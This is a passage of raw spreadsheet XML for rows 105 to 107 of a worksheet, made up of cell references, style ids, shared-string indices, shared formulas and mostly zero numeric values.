        <v>12</v>
      </c>
      <c r="IB105" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC105" s="120" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="ID105" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE105" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF105" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG105" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH105" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II105" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ105" s="98" t="str">
        <f t="shared" si="56"/>
        <v>NO</v>
      </c>
      <c r="IK105" s="99">
        <v>3.0</v>
      </c>
      <c r="IL105" s="99">
        <v>0.0</v>
      </c>
      <c r="IM105" s="121">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="IN105" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO105" s="98">
        <v>0.0</v>
      </c>
      <c r="IP105" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ105" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR105" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS105" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT105" s="127"/>
      <c r="IU105" s="127"/>
      <c r="IV105" s="127"/>
      <c r="IW105" s="127"/>
      <c r="IX105" s="127"/>
      <c r="IY105" s="127"/>
      <c r="IZ105" s="127"/>
      <c r="JA105" s="127"/>
      <c r="JB105" s="127"/>
      <c r="JC105" s="127"/>
      <c r="JD105" s="127"/>
      <c r="JE105" s="127"/>
      <c r="JF105" s="127"/>
      <c r="JG105" s="127"/>
      <c r="JH105" s="127"/>
      <c r="JI105" s="127"/>
      <c r="JJ105" s="127"/>
      <c r="JK105" s="127"/>
      <c r="JL105" s="127"/>
      <c r="JM105" s="127"/>
      <c r="JN105" s="127"/>
      <c r="JO105" s="127"/>
      <c r="JP105" s="127"/>
      <c r="JQ105" s="127"/>
      <c r="JR105" s="127"/>
      <c r="JS105" s="127"/>
      <c r="JT105" s="127"/>
      <c r="JU105" s="127"/>
      <c r="JV105" s="127"/>
      <c r="JW105" s="127"/>
      <c r="JX105" s="127"/>
      <c r="JY105" s="127"/>
      <c r="JZ105" s="127"/>
      <c r="KA105" s="127"/>
      <c r="KB105" s="127"/>
      <c r="KC105" s="127"/>
      <c r="KD105" s="127"/>
      <c r="KE105" s="127"/>
      <c r="KF105" s="127"/>
      <c r="KG105" s="127"/>
      <c r="KH105" s="127"/>
      <c r="KI105" s="127"/>
      <c r="KJ105" s="127"/>
      <c r="KK105" s="127"/>
      <c r="KL105" s="127"/>
      <c r="KM105" s="127"/>
      <c r="KN105" s="127"/>
      <c r="KO105" s="127"/>
      <c r="KP105" s="127"/>
      <c r="KQ105" s="127"/>
      <c r="KR105" s="127"/>
      <c r="KS105" s="127"/>
      <c r="KT105" s="127"/>
      <c r="KU105" s="127"/>
      <c r="KV105" s="127"/>
      <c r="KW105" s="127"/>
      <c r="KX105" s="127"/>
      <c r="KY105" s="127"/>
      <c r="KZ105" s="127"/>
      <c r="LA105" s="127"/>
      <c r="LB105" s="127"/>
      <c r="LC105" s="127"/>
      <c r="LD105" s="127"/>
      <c r="LE105" s="127"/>
      <c r="LF105" s="127"/>
      <c r="LG105" s="127"/>
      <c r="LH105" s="127"/>
      <c r="LI105" s="127"/>
      <c r="LJ105" s="127"/>
      <c r="LK105" s="127"/>
      <c r="LL105" s="127"/>
      <c r="LM105" s="127"/>
      <c r="LN105" s="127"/>
      <c r="LO105" s="127"/>
      <c r="LP105" s="127"/>
      <c r="LQ105" s="127"/>
      <c r="LR105" s="127"/>
      <c r="LS105" s="127"/>
      <c r="LT105" s="127"/>
      <c r="LU105" s="127"/>
      <c r="LV105" s="127"/>
      <c r="LW105" s="127"/>
      <c r="LX105" s="127"/>
      <c r="LY105" s="127"/>
      <c r="LZ105" s="127"/>
      <c r="MA105" s="127"/>
      <c r="MB105" s="127"/>
      <c r="MC105" s="127"/>
      <c r="MD105" s="127"/>
      <c r="ME105" s="127"/>
      <c r="MF105" s="127"/>
      <c r="MG105" s="127"/>
      <c r="MH105" s="127"/>
      <c r="MI105" s="127"/>
      <c r="MJ105" s="127"/>
      <c r="MK105" s="127"/>
      <c r="ML105" s="127"/>
      <c r="MM105" s="127"/>
      <c r="MN105" s="127"/>
      <c r="MO105" s="127"/>
      <c r="MP105" s="127"/>
      <c r="MQ105" s="127"/>
      <c r="MR105" s="127"/>
      <c r="MS105" s="127"/>
      <c r="MT105" s="127"/>
      <c r="MU105" s="127"/>
      <c r="MV105" s="127"/>
      <c r="MW105" s="127"/>
      <c r="MX105" s="127"/>
      <c r="MY105" s="127"/>
      <c r="MZ105" s="127"/>
      <c r="NA105" s="127"/>
      <c r="NB105" s="127"/>
      <c r="NC105" s="127"/>
      <c r="ND105" s="127"/>
      <c r="NE105" s="127"/>
      <c r="NF105" s="127"/>
      <c r="NG105" s="127"/>
      <c r="NH105" s="127"/>
      <c r="NI105" s="127"/>
      <c r="NJ105" s="127"/>
      <c r="NK105" s="127"/>
      <c r="NL105" s="127"/>
      <c r="NM105" s="127"/>
      <c r="NN105" s="127"/>
      <c r="NO105" s="127"/>
      <c r="NP105" s="127"/>
      <c r="NQ105" s="127"/>
      <c r="NR105" s="127"/>
      <c r="NS105" s="127"/>
      <c r="NT105" s="127"/>
      <c r="NU105" s="127"/>
      <c r="NV105" s="127"/>
      <c r="NW105" s="127"/>
      <c r="NX105" s="127"/>
      <c r="NY105" s="127"/>
    </row>
    <row r="106" ht="170.25" customHeight="1">
      <c r="B106" s="89" t="s">
        <v>244</v>
      </c>
      <c r="C106" s="90" t="s">
        <v>427</v>
      </c>
      <c r="D106" s="90" t="s">
        <v>245</v>
      </c>
      <c r="E106" s="90" t="s">
        <v>1747</v>
      </c>
      <c r="F106" s="90" t="s">
        <v>1748</v>
      </c>
      <c r="G106" s="91" t="s">
        <v>1749</v>
      </c>
      <c r="H106" s="90" t="s">
        <v>1750</v>
      </c>
      <c r="I106" s="92" t="s">
        <v>1799</v>
      </c>
      <c r="J106" s="92" t="s">
        <v>1800</v>
      </c>
      <c r="K106" s="92" t="s">
        <v>1801</v>
      </c>
      <c r="L106" s="93" t="s">
        <v>1541</v>
      </c>
      <c r="M106" s="93">
        <v>13.0</v>
      </c>
      <c r="N106" s="93">
        <v>1.0</v>
      </c>
      <c r="O106" s="93">
        <v>0.0</v>
      </c>
      <c r="P106" s="93">
        <v>1.0</v>
      </c>
      <c r="Q106" s="93">
        <f t="shared" si="160"/>
        <v>1</v>
      </c>
      <c r="R106" s="93">
        <v>1.0</v>
      </c>
      <c r="S106" s="93">
        <v>0.0</v>
      </c>
      <c r="T106" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U106" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V106" s="96" t="s">
        <v>12</v>
      </c>
      <c r="W106" s="96" t="s">
        <v>1802</v>
      </c>
      <c r="X106" s="97" t="s">
        <v>1803</v>
      </c>
      <c r="Y106" s="126" t="s">
        <v>1804</v>
      </c>
      <c r="Z106" s="126" t="s">
        <v>1755</v>
      </c>
      <c r="AA106" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB106" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC106" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD106" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE106" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF106" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG106" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH106" s="99" t="s">
        <v>1805</v>
      </c>
      <c r="AI106" s="99" t="s">
        <v>481</v>
      </c>
      <c r="AJ106" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK106" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL106" s="100">
        <v>0.0</v>
      </c>
      <c r="AM106" s="100">
        <v>0.0</v>
      </c>
      <c r="AN106" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO106" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP106" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ106" s="100">
        <v>0.0</v>
      </c>
      <c r="AR106" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS106" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT106" s="100" t="str">
        <f t="shared" si="164"/>
        <v>-</v>
      </c>
      <c r="AU106" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV106" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW106" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX106" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY106" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ106" s="100">
        <v>0.0</v>
      </c>
      <c r="BA106" s="102">
        <v>13.0</v>
      </c>
      <c r="BB106" s="102">
        <v>0.0</v>
      </c>
      <c r="BC106" s="102">
        <v>0.0</v>
      </c>
      <c r="BD106" s="102">
        <v>0.0</v>
      </c>
      <c r="BE106" s="102">
        <v>0.0</v>
      </c>
      <c r="BF106" s="102">
        <v>0.0</v>
      </c>
      <c r="BG106" s="102">
        <v>0.0</v>
      </c>
      <c r="BH106" s="102">
        <v>0.0</v>
      </c>
      <c r="BI106" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ106" s="102">
        <v>0.0</v>
      </c>
      <c r="BK106" s="102">
        <v>0.0</v>
      </c>
      <c r="BL106" s="103">
        <f t="shared" si="112"/>
        <v>0</v>
      </c>
      <c r="BM106" s="103">
        <f t="shared" si="113"/>
        <v>0</v>
      </c>
      <c r="BN106" s="103">
        <f t="shared" si="114"/>
        <v>0</v>
      </c>
      <c r="BO106" s="103">
        <f t="shared" si="115"/>
        <v>0</v>
      </c>
      <c r="BP106" s="103">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="BQ106" s="103">
        <f t="shared" si="117"/>
        <v>0</v>
      </c>
      <c r="BR106" s="103">
        <f t="shared" si="118"/>
        <v>0</v>
      </c>
      <c r="BS106" s="103">
        <f t="shared" si="119"/>
        <v>0</v>
      </c>
      <c r="BT106" s="103">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BU106" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV106" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW106" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX106" s="104">
        <v>0.0</v>
      </c>
      <c r="BY106" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ106" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA106" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB106" s="104">
        <v>0.0</v>
      </c>
      <c r="CC106" s="104">
        <v>0.0</v>
      </c>
      <c r="CD106" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE106" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF106" s="104" t="str">
        <f t="shared" si="163"/>
        <v>-</v>
      </c>
      <c r="CG106" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH106" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI106" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ106" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK106" s="104">
        <v>0.0</v>
      </c>
      <c r="CL106" s="104">
        <v>0.0</v>
      </c>
      <c r="CM106" s="105">
        <v>12.0</v>
      </c>
      <c r="CN106" s="105">
        <v>0.0</v>
      </c>
      <c r="CO106" s="105">
        <v>0.0</v>
      </c>
      <c r="CP106" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ106" s="105">
        <v>0.0</v>
      </c>
      <c r="CR106" s="105">
        <v>0.0</v>
      </c>
      <c r="CS106" s="105">
        <v>0.0</v>
      </c>
      <c r="CT106" s="105">
        <v>0.0</v>
      </c>
      <c r="CU106" s="105">
        <v>0.0</v>
      </c>
      <c r="CV106" s="105">
        <v>0.0</v>
      </c>
      <c r="CW106" s="105">
        <v>0.0</v>
      </c>
      <c r="CX106" s="105">
        <v>0.0</v>
      </c>
      <c r="CY106" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ106" s="105">
        <v>0.0</v>
      </c>
      <c r="DA106" s="105">
        <v>0.0</v>
      </c>
      <c r="DB106" s="106">
        <f t="shared" si="122"/>
        <v>0</v>
      </c>
      <c r="DC106" s="106">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="DD106" s="106">
        <f t="shared" si="124"/>
        <v>0</v>
      </c>
      <c r="DE106" s="106">
        <f t="shared" si="125"/>
        <v>0</v>
      </c>
      <c r="DF106" s="106">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="DG106" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH106" s="106">
        <f t="shared" si="127"/>
        <v>0</v>
      </c>
      <c r="DI106" s="106">
        <f t="shared" si="128"/>
        <v>0</v>
      </c>
      <c r="DJ106" s="106">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="DK106" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL106" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM106" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DN106" s="108">
        <v>0.0</v>
      </c>
      <c r="DO106" s="108">
        <v>0.0</v>
      </c>
      <c r="DP106" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ106" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DR106" s="108">
        <v>0.0</v>
      </c>
      <c r="DS106" s="108">
        <v>0.0</v>
      </c>
      <c r="DT106" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU106" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV106" s="108" t="str">
        <f t="shared" si="154"/>
        <v>-</v>
      </c>
      <c r="DW106" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX106" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY106" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ106" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA106" s="108">
        <v>0.0</v>
      </c>
      <c r="EB106" s="108">
        <v>0.0</v>
      </c>
      <c r="EC106" s="109">
        <v>13.0</v>
      </c>
      <c r="ED106" s="109">
        <v>0.0</v>
      </c>
      <c r="EE106" s="109">
        <v>0.0</v>
      </c>
      <c r="EF106" s="109">
        <v>0.0</v>
      </c>
      <c r="EG106" s="109">
        <v>0.0</v>
      </c>
      <c r="EH106" s="109">
        <v>0.0</v>
      </c>
      <c r="EI106" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ106" s="109">
        <v>0.0</v>
      </c>
      <c r="EK106" s="109">
        <v>0.0</v>
      </c>
      <c r="EL106" s="109">
        <v>0.0</v>
      </c>
      <c r="EM106" s="109">
        <v>0.0</v>
      </c>
      <c r="EN106" s="109">
        <v>0.0</v>
      </c>
      <c r="EO106" s="109">
        <v>0.0</v>
      </c>
      <c r="EP106" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ106" s="109">
        <v>0.0</v>
      </c>
      <c r="ER106" s="110">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="ES106" s="110">
        <f t="shared" si="131"/>
        <v>0</v>
      </c>
      <c r="ET106" s="110">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="EU106" s="110">
        <f t="shared" si="133"/>
        <v>0</v>
      </c>
      <c r="EV106" s="110">
        <f t="shared" si="134"/>
        <v>0</v>
      </c>
      <c r="EW106" s="110">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="EX106" s="110">
        <f t="shared" si="136"/>
        <v>0</v>
      </c>
      <c r="EY106" s="110">
        <f t="shared" si="137"/>
        <v>0</v>
      </c>
      <c r="EZ106" s="110">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="FA106" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB106" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC106" s="111" t="s">
        <v>599</v>
      </c>
      <c r="FD106" s="111">
        <v>3.0</v>
      </c>
      <c r="FE106" s="111">
        <v>10.0</v>
      </c>
      <c r="FF106" s="101" t="s">
        <v>599</v>
      </c>
      <c r="FG106" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FH106" s="111">
        <v>0.0</v>
      </c>
      <c r="FI106" s="111">
        <v>0.0</v>
      </c>
      <c r="FJ106" s="111" t="s">
        <v>599</v>
      </c>
      <c r="FK106" s="111" t="s">
        <v>599</v>
      </c>
      <c r="FL106" s="111" t="str">
        <f t="shared" si="155"/>
        <v>2002752, 2002749, 2100472</v>
      </c>
      <c r="FM106" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN106" s="111" t="s">
        <v>599</v>
      </c>
      <c r="FO106" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP106" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ106" s="111">
        <v>0.0</v>
      </c>
      <c r="FR106" s="111">
        <v>0.0</v>
      </c>
      <c r="FS106" s="112">
        <v>12.0</v>
      </c>
      <c r="FT106" s="112">
        <v>4.0</v>
      </c>
      <c r="FU106" s="112">
        <v>7.0</v>
      </c>
      <c r="FV106" s="112">
        <v>0.0</v>
      </c>
      <c r="FW106" s="112">
        <v>10.0</v>
      </c>
      <c r="FX106" s="112">
        <v>10.0</v>
      </c>
      <c r="FY106" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ106" s="112">
        <v>0.0</v>
      </c>
      <c r="GA106" s="112">
        <v>0.0</v>
      </c>
      <c r="GB106" s="112">
        <v>0.0</v>
      </c>
      <c r="GC106" s="112">
        <v>0.0</v>
      </c>
      <c r="GD106" s="112">
        <v>0.0</v>
      </c>
      <c r="GE106" s="112">
        <v>0.0</v>
      </c>
      <c r="GF106" s="112">
        <v>0.0</v>
      </c>
      <c r="GG106" s="112">
        <v>0.0</v>
      </c>
      <c r="GH106" s="113">
        <f t="shared" si="139"/>
        <v>4</v>
      </c>
      <c r="GI106" s="113">
        <f t="shared" si="140"/>
        <v>0</v>
      </c>
      <c r="GJ106" s="113">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="GK106" s="113">
        <f t="shared" si="142"/>
        <v>7</v>
      </c>
      <c r="GL106" s="113">
        <f t="shared" si="143"/>
        <v>0</v>
      </c>
      <c r="GM106" s="113">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="GN106" s="113">
        <f t="shared" si="145"/>
        <v>10</v>
      </c>
      <c r="GO106" s="113">
        <f t="shared" si="146"/>
        <v>0</v>
      </c>
      <c r="GP106" s="113">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="GQ106" s="114">
        <f t="shared" si="108"/>
        <v>0</v>
      </c>
      <c r="GR106" s="113">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="GS106" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT106" s="94" t="s">
        <v>1806</v>
      </c>
      <c r="GU106" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV106" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW106" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX106" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY106" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ106" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA106" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB106" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC106" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD106" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE106" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF106" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG106" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH106" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI106" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ106" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK106" s="93" t="str">
        <f t="shared" si="51"/>
        <v>NO</v>
      </c>
      <c r="HL106" s="93">
        <v>13.0</v>
      </c>
      <c r="HM106" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN106" s="93">
        <v>0.0</v>
      </c>
      <c r="HO106" s="93">
        <v>0.0</v>
      </c>
      <c r="HP106" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ106" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR106" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS106" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT106" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU106" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV106" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW106" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX106" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY106" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ106" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA106" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB106" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC106" s="120" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="ID106" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE106" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF106" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG106" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH106" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II106" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ106" s="98" t="str">
        <f t="shared" si="56"/>
        <v>NO</v>
      </c>
      <c r="IK106" s="99">
        <v>12.0</v>
      </c>
      <c r="IL106" s="99">
        <v>0.0</v>
      </c>
      <c r="IM106" s="121">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="IN106" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO106" s="98">
        <v>0.0</v>
      </c>
      <c r="IP106" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ106" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR106" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS106" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT106" s="127"/>
      <c r="IU106" s="127"/>
      <c r="IV106" s="127"/>
      <c r="IW106" s="127"/>
      <c r="IX106" s="127"/>
      <c r="IY106" s="127"/>
      <c r="IZ106" s="127"/>
      <c r="JA106" s="127"/>
      <c r="JB106" s="127"/>
      <c r="JC106" s="127"/>
      <c r="JD106" s="127"/>
      <c r="JE106" s="127"/>
      <c r="JF106" s="127"/>
      <c r="JG106" s="127"/>
      <c r="JH106" s="127"/>
      <c r="JI106" s="127"/>
      <c r="JJ106" s="127"/>
      <c r="JK106" s="127"/>
      <c r="JL106" s="127"/>
      <c r="JM106" s="127"/>
      <c r="JN106" s="127"/>
      <c r="JO106" s="127"/>
      <c r="JP106" s="127"/>
      <c r="JQ106" s="127"/>
      <c r="JR106" s="127"/>
      <c r="JS106" s="127"/>
      <c r="JT106" s="127"/>
      <c r="JU106" s="127"/>
      <c r="JV106" s="127"/>
      <c r="JW106" s="127"/>
      <c r="JX106" s="127"/>
      <c r="JY106" s="127"/>
      <c r="JZ106" s="127"/>
      <c r="KA106" s="127"/>
      <c r="KB106" s="127"/>
      <c r="KC106" s="127"/>
      <c r="KD106" s="127"/>
      <c r="KE106" s="127"/>
      <c r="KF106" s="127"/>
      <c r="KG106" s="127"/>
      <c r="KH106" s="127"/>
      <c r="KI106" s="127"/>
      <c r="KJ106" s="127"/>
      <c r="KK106" s="127"/>
      <c r="KL106" s="127"/>
      <c r="KM106" s="127"/>
      <c r="KN106" s="127"/>
      <c r="KO106" s="127"/>
      <c r="KP106" s="127"/>
      <c r="KQ106" s="127"/>
      <c r="KR106" s="127"/>
      <c r="KS106" s="127"/>
      <c r="KT106" s="127"/>
      <c r="KU106" s="127"/>
      <c r="KV106" s="127"/>
      <c r="KW106" s="127"/>
      <c r="KX106" s="127"/>
      <c r="KY106" s="127"/>
      <c r="KZ106" s="127"/>
      <c r="LA106" s="127"/>
      <c r="LB106" s="127"/>
      <c r="LC106" s="127"/>
      <c r="LD106" s="127"/>
      <c r="LE106" s="127"/>
      <c r="LF106" s="127"/>
      <c r="LG106" s="127"/>
      <c r="LH106" s="127"/>
      <c r="LI106" s="127"/>
      <c r="LJ106" s="127"/>
      <c r="LK106" s="127"/>
      <c r="LL106" s="127"/>
      <c r="LM106" s="127"/>
      <c r="LN106" s="127"/>
      <c r="LO106" s="127"/>
      <c r="LP106" s="127"/>
      <c r="LQ106" s="127"/>
      <c r="LR106" s="127"/>
      <c r="LS106" s="127"/>
      <c r="LT106" s="127"/>
      <c r="LU106" s="127"/>
      <c r="LV106" s="127"/>
      <c r="LW106" s="127"/>
      <c r="LX106" s="127"/>
      <c r="LY106" s="127"/>
      <c r="LZ106" s="127"/>
      <c r="MA106" s="127"/>
      <c r="MB106" s="127"/>
      <c r="MC106" s="127"/>
      <c r="MD106" s="127"/>
      <c r="ME106" s="127"/>
      <c r="MF106" s="127"/>
      <c r="MG106" s="127"/>
      <c r="MH106" s="127"/>
      <c r="MI106" s="127"/>
      <c r="MJ106" s="127"/>
      <c r="MK106" s="127"/>
      <c r="ML106" s="127"/>
      <c r="MM106" s="127"/>
      <c r="MN106" s="127"/>
      <c r="MO106" s="127"/>
      <c r="MP106" s="127"/>
      <c r="MQ106" s="127"/>
      <c r="MR106" s="127"/>
      <c r="MS106" s="127"/>
      <c r="MT106" s="127"/>
      <c r="MU106" s="127"/>
      <c r="MV106" s="127"/>
      <c r="MW106" s="127"/>
      <c r="MX106" s="127"/>
      <c r="MY106" s="127"/>
      <c r="MZ106" s="127"/>
      <c r="NA106" s="127"/>
      <c r="NB106" s="127"/>
      <c r="NC106" s="127"/>
      <c r="ND106" s="127"/>
      <c r="NE106" s="127"/>
      <c r="NF106" s="127"/>
      <c r="NG106" s="127"/>
      <c r="NH106" s="127"/>
      <c r="NI106" s="127"/>
      <c r="NJ106" s="127"/>
      <c r="NK106" s="127"/>
      <c r="NL106" s="127"/>
      <c r="NM106" s="127"/>
      <c r="NN106" s="127"/>
      <c r="NO106" s="127"/>
      <c r="NP106" s="127"/>
      <c r="NQ106" s="127"/>
      <c r="NR106" s="127"/>
      <c r="NS106" s="127"/>
      <c r="NT106" s="127"/>
      <c r="NU106" s="127"/>
      <c r="NV106" s="127"/>
      <c r="NW106" s="127"/>
      <c r="NX106" s="127"/>
      <c r="NY106" s="127"/>
    </row>
    <row r="107" ht="153.75" customHeight="1">
      <c r="B107" s="89" t="s">
        <v>244</v>
      </c>
      <c r="C107" s="90" t="s">
        <v>427</v>
      </c>
      <c r="D107" s="90" t="s">
        <v>245</v>
      </c>
      <c r="E107" s="90" t="s">
        <v>1747</v>
      </c>
      <c r="F107" s="90" t="s">
        <v>1748</v>
      </c>
      <c r="G107" s="91" t="s">
        <v>1749</v>
      </c>
      <c r="H107" s="90" t="s">
        <v>1750</v>
      </c>
      <c r="I107" s="92" t="s">
        <v>1799</v>
      </c>
      <c r="J107" s="92" t="s">
        <v>563</v>
      </c>
      <c r="K107" s="92" t="s">
        <v>1807</v>
      </c>
      <c r="L107" s="93" t="s">
        <v>1541</v>
      </c>
      <c r="M107" s="93">
        <v>0.0</v>
      </c>
      <c r="N107" s="93">
        <v>1.0</v>
      </c>
      <c r="O107" s="93">
        <v>0.0</v>
      </c>
      <c r="P107" s="93">
        <v>2.0</v>
      </c>
      <c r="Q107" s="93">
        <f t="shared" si="160"/>
        <v>2</v>
      </c>
      <c r="R107" s="93">
        <v>2.0</v>
      </c>
      <c r="S107" s="93">
        <v>0.0</v>
      </c>
      <c r="T107" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U107" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V107" s="96" t="s">
        <v>12</v>
      </c>
      <c r="W107" s="96" t="s">
        <v>1808</v>
      </c>
      <c r="X107" s="97" t="s">
        <v>1809</v>
      </c>
      <c r="Y107" s="126" t="s">
        <v>1810</v>
      </c>
      <c r="Z107" s="126" t="s">
        <v>1811</v>
      </c>
      <c r="AA107" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB107" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC107" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD107" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE107" s="95" t="s">
        <v>456</v>
      </c>
      <c r="AF107" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG107" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH107" s="99" t="s">
        <v>1805</v>
      </c>
      <c r="AI107" s="99" t="s">
        <v>481</v>
      </c>
      <c r="AJ107" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK107" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL107" s="100">
        <v>0.0</v>
      </c>
      <c r="AM107" s="100">
        <v>0.0</v>
      </c>
      <c r="AN107" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO107" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP107" s="100">
        <v>0.0</v>
